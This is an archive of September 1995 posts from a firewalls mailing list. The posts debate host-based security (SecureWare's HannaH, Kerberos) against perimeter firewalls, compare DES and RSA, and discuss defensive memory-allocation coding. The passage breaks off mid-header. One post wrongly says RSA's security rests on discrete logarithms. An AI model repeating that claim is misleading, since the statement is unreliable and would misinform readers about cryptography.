From firewalls-owner Fri Sep 1 05:30:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA23523 for firewalls-outgoing; Fri, 1 Sep 1995 05:21:57 -0700 Received: from imonics.com (netadmin.imonics.com [192.154.44.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA23516 for ; Fri, 1 Sep 1995 05:21:53 -0700 Received: from faraday.imonics.com (faraday.imonics.com [205.139.210.246]) by imonics.com (8.6.12/8.6.12) with SMTP id IAA14587 for ; Fri, 1 Sep 1995 08:20:26 -0400 From: James Brigman - Imonics Development Received: by faraday.imonics.com (5.x/SMI-SVR4) id AA00605; Fri, 1 Sep 1995 08:20:21 -0400 Date: Fri, 1 Sep 1995 08:20:21 -0400 Message-Id: <9509011220.AA00605@faraday.imonics.com> To: firewalls@greatcircle.com Subject: Re: Linux distributions X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 31 Aug 1995, Andrew Foss wrote: > I've a need for a Linux bastion host to relay mail. The only distribution > I've worked with is Yggdrasil?sp? > Does anyone with more Linux experience than I, have any preference for one > version over another? If so, where can I get it, I'm not on any Linux > mailing lists. Personal Experiences: - yggdrasil lags some of the other releases - their mscdex driver never worked with Mitsumi 4x IDE cdrom - this information applies to the "fall 94" release of yggdrasil - Avoid the "fall 94" Yggdrasil release Now using Slackware (1.2.3 kernel) and Red Hat - Both install very differently - Good success with both - Red Hat comes with some pretty nice tools - Slackware=PHT April 1995 and Red Hat "Mother's Day" Release - New Red Hat in the works. I haven't run a firewall with either, but there are active discussions on the mailing lists for both. URL: www.redhat.com and www.pht.com. Gud Luk... From firewalls-owner Fri Sep 1 06:02:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA24429 for firewalls-outgoing; Fri, 1 Sep 1995 06:00:38 -0700 Received: from imonics.com (netadmin.imonics.com [192.154.44.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA24414 for ; Fri, 1 Sep 1995 06:00:35 -0700 Received: from faraday.imonics.com (faraday.imonics.com [205.139.210.246]) by imonics.com (8.6.12/8.6.12) with SMTP id IAA15195 for ; Fri, 1 Sep 1995 08:59:09 -0400 From: James Brigman - Imonics Development Received: by faraday.imonics.com (5.x/SMI-SVR4) id AA00624; Fri, 1 Sep 1995 08:59:04 -0400 Date: Fri, 1 Sep 1995 08:59:04 -0400 Message-Id: <9509011259.AA00624@faraday.imonics.com> To: firewalls@greatcircle.com Subject: Re: Linux distributions X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > James Brigman - Imonics Development wrote this: > > > > - Slackware=PHT April 1995 and Red Hat "Mother's Day" Release > > Hi -- I've run various Slackware releases for a couple of years and > haven't heard of "PHT". What does that stand for? > > Thanks! > -Bill > > -- > Bill Heiser, Individual, Inc., Network Services > billh@individual.com (home: bill@bh.org, http://www.bh.org/) Bill: "PHT" is Pacific Hi-Tech. They are a distributor of a very inexpensive two CD-ROM version of Slackware. They also have a nice reprint of the Matt Welsh documentation. Please forgive the bandwidth: I have no connection to PHT commercial or otherwise....JKB From firewalls-owner Fri Sep 1 06:30:29 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA25206 for firewalls-outgoing; Fri, 1 Sep 1995 06:25:00 -0700 Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA25199; Fri, 1 Sep 1995 06:24:57 -0700 Message-Id: <199509011324.GAA25199@miles.greatcircle.com> Received: by habanero.jmu.edu (1.37.109.16/16.2) id AA278111325; Fri, 1 Sep 1995 09:15:25 -0400 Date: Fri, 1 Sep 1995 09:15:25 -0400 From: gary flynn To: gary@habanero.jmu.edu, isdmill@gatekeeper.ddp.state.me.us Subject: Re: HannaH from SecureWare Inc. Cc: adm_lcorea@vax1.acs.jmu.edu, firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, foxtrot@sware.com, oit_cathy@vax1.acs.jmu.edu, oit_charles@vax1.acs.jmu.edu, oit_dbh@vax1.acs.jmu.edu, shan.bell@sware.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > > This Hannah product looks like what I've been looking for. It puts > > "network security" where it belongs...on the nodes. I liken this > > to putting locks on building doors rather than gates across > > heavily traveled roads. Then the communications infrastructure > > can be upgraded and used as intended...as a communications highway. > > Problems with firewall throughput go away. > > [...] > > > Is anyone else excited about this product or am I missing something? > > I'm not familiar with this particular product. That said, I'd like to > address a couple of point that you make about it. > > First, there's the possibility that people will not use the product, or > that their product will not fit all type, styles, and rev levels of > computer on your network. Once one of the systems on your network is > compromised it becomes a safe staging area for attacks on the rest of > your network. Which leads us to ... > Policy should take care of what people use. If policy is ignored, then you won't have much security no matter what you do. The product is limited to winsock, hpux, and SCO right now but good products have a habit of being rapidly ported. If the critical systems are protected individually, its less disasterous if a non-critical system gets compromised. This isn't true of a "soft chewy center". > Second, the whole reason people put the soft chewy center in the middle > of a very hard shell is so there is a single access point to be > administered. It's one thing to get a good security person to > manage/monitor the firewall through which all traffic flows. It's > another thing altogether (usually thought impossible in any sizeable > installation) to try and have many administrators adequately secure their > systems. > Hannah is centrally administered although you have to install the product on all the platforms. So there is a central security administrator. Software distribution, installation, and configuration managment mechanisms and policies need to exist for network/node management anyway, so the addition of one more product shouldn't negate the overall concept. gary From firewalls-owner Fri Sep 1 07:00:47 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA25898 for firewalls-outgoing; Fri, 1 Sep 1995 06:53:12 -0700 Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA25891 for ; Fri, 1 Sep 1995 06:53:09 -0700 From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU via ESMTP; Fri, 1 Sep 1995 09:51:28 -0400 Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.6.12/res.client.cf-3.7) id JAA02782; Fri, 1 Sep 1995 09:51:26 -0400 Date: Fri, 1 Sep 1995 09:51:26 -0400 Message-Id: <199509011351.JAA02782@SPARKY.CF.CS.YALE.EDU> To: firewalls@greatcircle.com, teck@ms.mimos.my Subject: Re: comparison study between DES and RSA Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From: Lee Hooi Teck wrote: >I am looking into network security currently and found that most of the >products use either DES or RSA for authentication and encryption. > >Is there any info or document that has mentioned the pros and cons of >this two type of cryptosystems? How is these technologies being used in >digital signature? > >Hope that there is info for the export issue on these two systems as well. There are three recent books which cover cryptosystems, digital signatures and related material in some detail : 1. "Applied Cryptography" by Bruce Schnier (sp?) 2. "Network Security - PRIATE Communication in a PUBLIC World", by Charles Kaufman, Radia Perlman and MIke Speciner 3. and Stallings new book which has a title which looks something like "Network and Internetwork Security" - Morrow From firewalls-owner Fri Sep 1 07:02:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA25605 for firewalls-outgoing; Fri, 1 Sep 1995 06:45:03 -0700 Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA25590; Fri, 1 Sep 1995 06:44:58 -0700 Message-Id: <199509011344.GAA25590@miles.greatcircle.com> Received: by habanero.jmu.edu (1.37.109.16/16.2) id AA280182528; Fri, 1 Sep 1995 09:35:29 -0400 Date: Fri, 1 Sep 1995 09:35:29 -0400 From: gary flynn To: alan@mid.net, isdmill@gatekeeper.ddp.state.me.us Subject: Re: HannaH from SecureWare Inc. Cc: adm_lcorea@vax1.acs.jmu.edu, firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, foxtrot@sware.com, gary@habanero.jmu.edu, oit_cathy@vax1.acs.jmu.edu, oit_charles@vax1.acs.jmu.edu, oit_dbh@vax1.acs.jmu.edu, shan.bell@sware.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Alan Hannan wrote: > -dm-] > -dm-] On Thu, 31 Aug 1995, gary flynn wrote: > -dm-] > gflynn] This Hannah product looks like what I've been looking for. It puts > gflynn] "network security" where it belongs...on the nodes. I liken this > gflynn] to putting locks on building doors rather than gates across > gflynn] heavily traveled roads. Then the communications infrastructure > gflynn] can be upgraded and used as intended...as a communications highway. > gflynn] Problems with firewall throughput go away. > > Sure, let's just open up the bloody borders of our country to anyone, we > wouldn't want to impede any travel, would we? Heavan forbid Iraqis should > actually have to stop at the border to our country, we should allow > them and all others to come in unimpeded. Geez. > Then again if you have to go through customs in every day affairs across the neighborhood, it makes getting work done a bit tedious. Not to mention the inefficiencies in upgrading to newer, faster communications technology, protocols, or products. If they can't access anything once inside the border, whats the harm? The whole point is protecting assets. But enough with the highway analogy. Given that a network is a group of interconnected computing devices, then "network security" doesn't necessary mean data communications security. It means the resources connected to the data communications are secure. I think it would be better to secure the resources in some central way than to impede the data communications. If the node is protected from access and its communications with other nodes are authenticated and encrypted, doesn't this solve the problem? > gflynn] Is anyone else excited about this product or am I missing something? > -dm-] > -dm-] I'm not familiar with this particular product. That said, I'd like to > -dm-] address a couple of point that you make about it. > -dm-] > -dm-] Second, the whole reason people put the soft chewy center in the middle > -dm-] of a very hard shell is so there is a single access point to be > -dm-] administered. It's one thing to get a good security person to > -dm-] manage/monitor the firewall through which all traffic flows. It's > -dm-] another thing altogether (usually thought impossible in any sizeable > -dm-] installation) to try and have many administrators adequately secure their > -dm-] systems. > > Quite obviously, one that thinks individual host security should have > more emphasis than network security has never tried to implement such a > policy. More clearly, one who thinks indiv. hosts are more important > than network security has no concept of time=money. > I thought the intention of "network security" was to protect individual hosts. Implementation of host based security is hampered by the necessity to administer hosts with inherently poor security. If good products are embedded into the operating systems of the hosts, the implementation should prove much easier and more effective. Gary Flynn Network Manager James Madison University > -- > Alan Hannan Email: alan@mid.net > Network Systems Administrator Voice: (402) 472-0239 > MIDnet, Lincoln NOC Office Fax: (402) 472-0240 > > " [sometimes] the game of outsmarting the supervisor is > more interesting than the work itself " - Quinn Mills > From firewalls-owner Fri Sep 1 07:30:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA26706 for firewalls-outgoing; Fri, 1 Sep 1995 07:18:32 -0700 Received: from yage.tembel.org (yage.tembel.org [206.43.170.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA26699 for ; Fri, 1 Sep 1995 07:18:26 -0700 Received: by yage.tembel.org (Smail3.1.29.1 #9) id m0soWtu-000DPEC; Fri, 1 Sep 95 14:16 GMT Message-Id: From: shields@tembel.org (Michael Shields) Subject: Re: HannaH from SecureWare Inc. To: gary@habanero.jmu.edu (gary flynn) Date: Fri, 1 Sep 1995 14:16:57 +0000 (GMT) Cc: gary@habanero.jmu.edu, firewalls-digest@GreatCircle.COM In-Reply-To: from "gary flynn" at 1995-09-01 10:00:21 X-Dogma: Microsoft is not the answer. Microsoft is the question. No is the answer. MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Content-Length: 1066 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > My (admitedly limited) understanding of Kerberos leads me > to believe the following: > > 1. Kerberos requires modification of each application that > its to be used with. Hence limited support. Hannah allows > the use of any application using standard winsock or > socket library calls on supported platforms. This is true, but it's necessary when you replace the authentication mechanism at the protocol level. Is HannaH providing link-layer encryption on a host-to-host level? > 2. Kerberos doesn't encrypt the data. Hannah can. Kerberos can. > 3. Hannah's "certificate diskette" for each user solves > some problems that Kerberos has on desktop machines. This is too vague. Kerberos works by having a ticket-granting ticket, a sort of master metaticket, which is sent from the Kerberos server encrypted in the user's passphrase. If the user can decrypt it (by giving the correct passphrase), he can get tickets which authenticate him to various services. If you describe the "certificate diskette" I can see how it compares. -- Shields. From firewalls-owner Fri Sep 1 07:32:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA26528 for firewalls-outgoing; Fri, 1 Sep 1995 07:09:59 -0700 Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA26521 for ; Fri, 1 Sep 1995 07:09:50 -0700 Message-Id: <199509011409.HAA26521@miles.greatcircle.com> Received: by habanero.jmu.edu (1.37.109.16/16.2) id AA282694021; Fri, 1 Sep 1995 10:00:21 -0400 Date: Fri, 1 Sep 1995 10:00:21 -0400 From: gary flynn To: gary@habanero.jmu.edu, shields@yage.tembel.org Subject: Re: HannaH from SecureWare Inc. Cc: firewalls-digest@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > > This Hannah product looks like what I've been looking for. It puts > > "network security" where it belongs...on the nodes. I liken this > [...] > > It seems so simple that someone else would have thought of it sooner. > > Kerberos. It's been available for many years, it's an open standard, > it's cross-platform, it's extensible, it's featureful, and the protocol > has been formally proven. > > I don't see what HannaH provides that Kerberos doesn't, except that > it's proprietary. > -- > Shields. > My (admitedly limited) understanding of Kerberos leads me to believe the following: 1. Kerberos requires modification of each application that its to be used with. Hence limited support. Hannah allows the use of any application using standard winsock or socket library calls on supported platforms. 2. Kerberos doesn't encrypt the data. Hannah can. 3. Hannah's "certificate diskette" for each user solves some problems that Kerberos has on desktop machines. gary From firewalls-owner Fri Sep 1 08:00:25 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA26459 for firewalls-outgoing; Fri, 1 Sep 1995 07:06:33 -0700 Received: from POWERED.ZOO.CS.YALE.EDU (ZOO-GW.CS.YALE.EDU [128.36.0.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA26452 for ; Fri, 1 Sep 1995 07:06:29 -0700 Received: from FROG.ZOO2.CS.YALE.EDU by POWERED.ZOO.CS.YALE.EDU (5.67b/res.host.cf-3.5) with SMTP id AA38296; Fri, 1 Sep 1995 10:05:05 -0400 Received: by FROG.ZOO2.CS.YALE.EDU (Sendmail-5.67b/res.client.cf-3.5) id AA14448; Fri, 1 Sep 1995 10:04:51 -0400 Date: Fri, 1 Sep 1995 10:04:51 -0400 (EDT) From: "Rev. Ben" To: Lee Hooi Teck Cc: firewalls@greatcircle.com Subject: Re: comparison study between DES and RSA In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- On Fri, 1 Sep 1995, Lee Hooi Teck wrote: > Hi, Hi Lee. > I am looking into network security currently and found that most of the > products use either DES or RSA for authentication and encryption. They're usually coupled for reasons below. > Is there any info or document that has mentioned the pros and cons of > this two type of cryptosystems? How is these technologies being used in > digital signature? DES and RSA are complimentary cryptosystems. RSA was invented to be a Public Key Algorithm. This means that it is assymettric--i.e. that a different key is used for decryption(private key) than for encryption(public key). RSA is very slow, but is used primarily for the secure exchange of keys to faster symettric block ciphers. RSA keys can also be an arbitrary length in order to make it as secure as you like. RSA derives its security from the difficulty of doing a discrete logarithm in a finite field. DES is a symmetric block cipher that uses the same key in both encryption and decryption. It can be very fast to implement in hardware, and derives its security, not from the difficulty of discrete but from being a secure cryptosystem. The key is 56 bits long(8 bytes with the high bit stripped). > Hope that there is info for the export issue on these two systems as well. You can get them both off-shore(out of the US)--try hacktic.nl or a yahoo search off shore. > Thanks in advance for the help. Certainly. Ben. ____ Ben Samman..............................................samman@cs.yale.edu I have learned silence from the talkative, toleration from the intolerant, and kindness from the unkind; yet, strange, I am ungrateful to those teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND! For information Email: zldf@clark.net http://www.netresponse.com/zldf PGP encrypted mail welcomed--finger samman@cs.yale.edu for public key -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3 iQB1AwUBMEcS/b5ALmeTVXAJAQGLbAL/d/+be65OJgUgDGSzL1u7n0ikIB8Z4zpO GixYKTLdVKDKsnhlhT2XRV4Tj+BedV6sMyRPiq87TnC8kOivoC0Qx52U4eNUvVol zT60E6yXSJxEs/Aum1ckATFaJQ5Ic7+N =Co9C -----END PGP SIGNATURE----- From firewalls-owner Fri Sep 1 08:30:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA29439 for firewalls-outgoing; Fri, 1 Sep 1995 08:25:29 -0700 Received: from phillipe.jmu.edu (phillipe.jmu.edu [134.126.71.226]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA29427; Fri, 1 Sep 1995 08:25:20 -0700 Received: by phillipe.jmu.edu (1.37.109.4/16.2) id AA05741; Fri, 1 Sep 95 11:22:21 -0400 Date: Fri, 1 Sep 1995 11:22:21 -0400 (EDT) From: Charles Cooley To: Alan Hannan Cc: David Miller , Gary Flynn , firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, adm_lcorea@VAX1.ACS.JMU.EDU, foxtrot@sware.com, oit_cathy@VAX1.ACS.JMU.EDU, oit_charles@VAX1.ACS.JMU.EDU, oit_dbh@VAX1.ACS.JMU.EDU, shan.bell@sware.com Subject: Re: HannaH from SecureWare Inc. In-Reply-To: <199508312229.RAA29405@gaijin.mid.net> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I should know better than to get into my supervisor's discussion with his boss on the CC: list, but ... Legend: alan] is Alan Hannan -dm-] is David Miller gflynn] is Gary Flynn -dm-] I'm not familiar with this particular product. That said, I'd like to -dm-] address a couple of point that you make about it. ... -dm-] Second, the whole reason people put the soft chewy center in the middle -dm-] of a very hard shell is so there is a single access point to be -dm-] administered. It's one thing to get a good security person to -dm-] manage/monitor the firewall through which all traffic flows. It's -dm-] another thing altogether (usually thought impossible in any sizeable -dm-] installation) to try and have many administrators adequately secure -dm-] their systems. Troy had strong walls and a decent army and so believed they were safe. A more vigilent night watch, was called for since the city was surrounded. "Soft chewy centers" behind a single line of defense are very dangerous. gflynn] This Hannah product looks like what I've been looking for. It puts gflynn] "network security" where it belongs...on the nodes. I liken this gflynn] to putting locks on building doors rather than gates across gflynn] heavily traveled roads. Then the communications infrastructure gflynn] can be upgraded and used as intended...as a communications highway. gflynn] Problems with firewall throughput go away. alan] Sure, let's just open up the bloody borders of our country to anyone, we alan] wouldn't want to impede any travel, would we? Heavan forbid Iraqis alan] should actually have to stop at the border to our country, we should alan] allow them and all others to come in unimpeded. Geez. While I agree that firewalls are an important defense to provide overall site security, it's not enough. The impression that I am getting from the two responses to Gary's message, is that firewall and other network security are significantly more important than individual host security mechanisms. The national border analogy provides a natural counter argument. Even countries with strong a strong military and secure borders, still maintain an internal police force and in larger communities individuals make sure that their door is locked. HannaH is designed to provide the "internal" security that most firewall based security strategies don't address. A significant portion of the security breaches are not from "foreigners" but from discontented and anti-social "natives" in the electronic world. gflynn] Is anyone else excited about this product or am I missing something? alan] Quite obviously, one that thinks individual host security should have alan] more emphasis than network security has never tried to implement such a alan] policy. More clearly, one who thinks indiv. hosts are more important alan] than network security has no concept of time=money. I believe that HannaH should be viewed as an alternative to Virtual LAN security schemes instead of firewalls and one of the complaints about Virtual LANs is maintainability. If you want to talk about time and money and their relation to the size of the network, don't forget that a larger network means a larger center. One of HannaH's advantages is that it provides a mechinism to provide security based on the identity of a person rather than a host. The old Internet concept of host is out of date. Hosts were multi-user systems owned and MANAGED by organizations and individual people were authenticated by those hosts. With the proliferation of PC class systems, many systems connected to networks are single user systems. The old assumptions about security (like the "secure" ports below 512/1024) can be vary dangerous. On our campus, we are already doing packet filtering at the routers, and eavesdrop protection, etc. at the hubs. In our environment, the same network and even the same machine may be used by students, faculty and staff for any number of different tasks. A mixed population which can not be phyically separated poses a problem that is significantly more complex than the "us" vs "them" situation. Charles Cooley Network Analyst From firewalls-owner Fri Sep 1 08:32:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA29391 for firewalls-outgoing; Fri, 1 Sep 1995 08:23:16 -0700 Received: from yage.tembel.org (yage.tembel.org [206.43.170.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA29383 for ; Fri, 1 Sep 1995 08:23:06 -0700 Received: by yage.tembel.org (Smail3.1.29.1 #9) id m0soXuT-000DS5C; Fri, 1 Sep 95 15:21 GMT Message-Id: From: shields@tembel.org (Michael Shields) Subject: Re: HannaH from SecureWare Inc. To: gary@habanero.jmu.edu (gary flynn) Date: Fri, 1 Sep 1995 15:21:35 +0000 (GMT) Cc: firewalls@greatcircle.com In-Reply-To: from "gary flynn" at 1995-09-01 10:29:39 X-Dogma: Microsoft is not the answer. Microsoft is the question. No is the answer. MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Content-Length: 2677 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I think I'll save us both some time and just point you at > their web page. There is a white paper there that seems > fairly comprehensive. With your understanding of Kerberos, > you may be able to draw better comparisons than if I > try and send you second hand information. I would appreciate > your opinion of the product if you get a chance to look > at it, though. > > www.sware.com/papers/hannah Based on that white paper, an analysis: HannaH requires key distribution on read-only floppies, which contain a key "wrapped" (encrypted) in the user's password. This is a primitive attempt at two-factor authentication, but since floppies can be copied, it seems a poor one. It also rules out many portables which have no floppy drives. Finally, as long as you require the user to carry something, why not something like a smart token, which can prove that the user holds it? HannaH provides authorization and logging mechanisms. Kerberos, per se, does not; it only provides authentication and integrity. While this isn't necessarily a bad architecture, taking access control out of the hands of the protocol does break many assumptions in protocols designed for Internet use. I think that because of this, many common applications will have to be modified for HannaH anyway. HannaH claims transparency. I don't what mechanism they use, so I ca'n't comment on if it is robust when communicating with non-HannaH endpoints. HannaH only protects TCP. Kerberos protects anything. I don't see a formal description of the HannaH protocol. Is it proprietary? Kerberos is public, and has even been formally proven. HannaH works "in direct opposition to many security efforts in the networking standards communities" (their words!). Because of this I don't know if the protocol is secure. Kerberos allows a tree or mesh of servers for distributed management. Kerberos allows redundant servers. HannaH seems to have one per "organization" and no inter-realm communication. The list at the end of the "what is unique about HannaH?" section seems to boil down to "HannaH doesn't have clear abstraction boundaries and thus is better than these individual services that do one thing each". This isn't clear thinking. Overall, I'd say as a first impression, that HannaH tries to be many things but doesn't convince me it does any of them especially well. It will probably find some market as a package solution but seems inferior to Kerberos plus management tools. (Kerberos could use someone to package it up as a security solution, since it's an excellent protocol.) I'd appreciate a comparison of HannaH vs. IPSEC by someone who knows about IPSEC. -- Shields. From firewalls-owner Fri Sep 1 09:02:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA29252 for firewalls-outgoing; Fri, 1 Sep 1995 08:17:00 -0700 Received: from gatekeeper.ddp.state.me.us (gatekeeper.ddp.state.me.us [141.114.130.70]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA29240; Fri, 1 Sep 1995 08:16:56 -0700 Received: from localhost by gatekeeper.ddp.state.me.us (8.6.5/1.37) id LAA05189; Fri, 1 Sep 1995 11:10:04 -0400 Date: Fri, 1 Sep 1995 11:10:03 -0400 (EDT) From: David Miller Subject: Re: HannaH from SecureWare Inc. To: gary flynn cc: gary@habanero.jmu.edu, adm_lcorea@vax1.acs.jmu.edu, firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, foxtrot@sware.com, oit_cathy@vax1.acs.jmu.edu, oit_charles@vax1.acs.jmu.edu, oit_dbh@vax1.acs.jmu.edu, shan.bell@sware.com In-Reply-To: <199509011318.JAA27684@gatekeeper.ddp.state.me.us> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 1 Sep 1995, gary flynn wrote: > > > > > This Hannah product looks like what I've been looking for. It puts > > > "network security" where it belongs...on the nodes. I liken this > > > to putting locks on building doors rather than gates across > > > heavily traveled roads. Then the communications infrastructure > > > can be upgraded and used as intended...as a communications highway. > > > Problems with firewall throughput go away. > > > > [...] > > > > > Is anyone else excited about this product or am I missing something? > > First, there's the possibility that people will not use the product, or > > that their product will not fit all type, styles, and rev levels of > > computer on your network. Once one of the systems on your network is > > compromised it becomes a safe staging area for attacks on the rest of > > your network. Which leads us to ... > > > > Policy should take care of what people use. If policy is ignored, then > you won't have much security no matter what you do. The product is That may be a justification, but it's not reality. There's a big difference between passively not following a policy by putting up a new product (Win 95 maybe) for which no security piece yet exists, and actively not following policy by a user maliciously establishing an outbound tcp connection to a remote host and passing all your confidential data out. Putting up a firewall secures the systems within which are run by well meaning but ignorant people. (From the external network, of course, not from all possible attacks). > limited to winsock, hpux, and SCO right now but good products have a > habit of being rapidly ported. If the critical systems are protected > individually, its less disasterous if a non-critical system gets > compromised. This isn't true of a "soft chewy center". And what happens when users try something different? BTW "winsock" is an API, not a particular product. It's like saying TCP instead of SCO. Those systems running winsock could be windows, or NT servers, on win95 products. Could be running twinsock, for that matter. > > > Second, the whole reason people put the soft chewy center in the middle > > of a very hard shell is so there is a single access point to be > > administered. It's one thing to get a good security person to > > manage/monitor the firewall through which all traffic flows. It's > > another thing altogether (usually thought impossible in any sizeable > > installation) to try and have many administrators adequately secure their > > systems. > > > > Hannah is centrally administered although you have to install the > product on all the platforms. So there is a central security > administrator. Software distribution, installation, and configuration > managment mechanisms and policies need to exist for network/node > management anyway, so the addition of one more product shouldn't > negate the overall concept. If you say so. I rather like the earlier analogy to letting the Iraqis roar down the highway because all the houses are locked. --- David ---------------------------------------------------------------------------- It's *amazing* what one can accomplish when one doesn't know what one can't do! From firewalls-owner Fri Sep 1 09:30:45 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA01436 for firewalls-outgoing; Fri, 1 Sep 1995 09:03:39 -0700 Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA01421 for ; Fri, 1 Sep 1995 09:03:30 -0700 Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id LAA20412; Fri, 1 Sep 1995 11:18:20 -0500 Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id LAA20408; Fri, 1 Sep 1995 11:18:19 -0500 Received: from hector.sctc.com (hector.sctc.com [172.17.192.85]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id LAA16935; Fri, 1 Sep 1995 11:02:05 -0500 Received: (from stockwel@localhost) by hector.sctc.com (8.6.12/8.6.9) id LAA07632; Fri, 1 Sep 1995 11:02:03 -0500 Date: Fri, 1 Sep 1995 11:02:03 -0500 From: Ted Stockwell Message-Id: <199509011602.LAA07632@hector.sctc.com> To: shields@tembel.org (Michael Shields) Cc: firewalls@GreatCircle.COM Subject: Re: FW: Programming Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: shields@tembel.org (Michael Shields) > Date: Fri, 1 Sep 1995 01:52:10 (GMT) > > > It is a pain to always check for "NULL" after attempting to allocate memory > > and to check for buffer overflows. Makes code downright hard to read since > > the flow of the program is cluttered with error checks. Yet, I depend on all > > this 'extra' code to make sure that people can't crash my firewall by > > overflowing memory with long lines, enormous mail recipient lists, busted > > network packets, and such. We all depend on our vendors doing reliable error > > handling and "failing safely". > > In something like allocating memory, where a failure is always fatal, > you can easily write an xmalloc() that is that a wrapper which either > returns a non-NULL pointer or dies. Then always call that instead of > straight malloc(). This is fairly easy. if a malloc() failure is fatal to the program, then denial of service attacks on long running daemons become easier. Flood them until they choke on memory resources and then they're gone. When possible, you want to fail the single transaction that depleted memory, but keep running -- resources may become available later when the system is less busy. (Obviously, there are applications where this is not possible/desireable.) > I always check *every* system call and most library routines as well. > It's part of my negative-space philosophy to coding -- you want to > disallow all the actions that are not part of what you want to accomplish. > It works beautifully. Maybe we can get launch a successful crusade to rewrite every useful piece of code with such good practices. But until that time, you need other security mechanisms to secure this useful, but less trustworthy, legacy code. -- Ted Stockwell, stockwel@sctc.com, Sidewinder From firewalls-owner Fri Sep 1 09:32:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA02333 for firewalls-outgoing; Fri, 1 Sep 1995 09:17:27 -0700 Received: from ncar.UCAR.EDU (ncar.ucar.edu [192.52.106.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA02324; Fri, 1 Sep 1995 09:17:23 -0700 Message-Id: <199509011615.KAA23389@ncar.ucar.EDU> Received: by ncar.ucar.EDU (NCAR-local/ NCAR Central Post Office 03/11/93) id KAA23389; Fri, 1 Sep 1995 10:15:41 -0600 Subject: Re: HannaH from SecureWare Inc. To: cooleycd@jmu.edu (Charles Cooley) Date: Fri, 1 Sep 95 10:15:39 MDT Cc: alan@mid.net, isdmill@gatekeeper.ddp.state.me.us, gary@habanero.jmu.edu, firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, adm_lcorea@VAX1.ACS.JMU.EDU, foxtrot@sware.com, oit_cathy@VAX1.ACS.JMU.EDU, oit_charles@VAX1.ACS.JMU.EDU, oit_dbh@VAX1.ACS.JMU.EDU, shan.bell@sware.com In-Reply-To: ; from "Charles Cooley" at Sep 1, 95 11:22 am From: woods@ncar.ucar.edu (Greg Woods) X-Mailer: ELM [version 2.3 